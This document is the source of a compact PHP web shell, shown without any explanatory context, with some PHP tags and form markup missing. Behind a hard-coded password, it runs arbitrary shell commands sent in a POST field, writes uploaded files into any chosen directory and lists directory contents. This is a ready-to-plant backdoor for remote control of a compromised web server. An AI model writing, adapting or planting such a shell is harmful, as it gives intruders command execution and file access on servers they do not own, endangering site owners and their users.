session_start();$password = "123456";if (!isset($_SESSION['l'])) { if (isset($_POST['p']) && $_POST['p'] == $password) { $_SESSION['l'] = true; } else { die('
Pass: <input type="submit">
'); }}$d = realpath(isset($_GET['d']) ? $_GET['d'] : '.');chdir($d);if (isset($_POST['c'])) { $out = shell_exec($_POST['c']." 2>&1"); }if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $d.'/'.$_FILES['f']['name']); }<body style="background:#000;color:#0f0;font-family:monospace;">

Path: echo $d;

CMD: <input type="submit">
if(isset($out)) echo "<pre>$out</pre>"; <hr>
Upload: <input type="submit">
<table border="1" width="100%"> foreach(scandir($d) as $f) { echo "$f"; }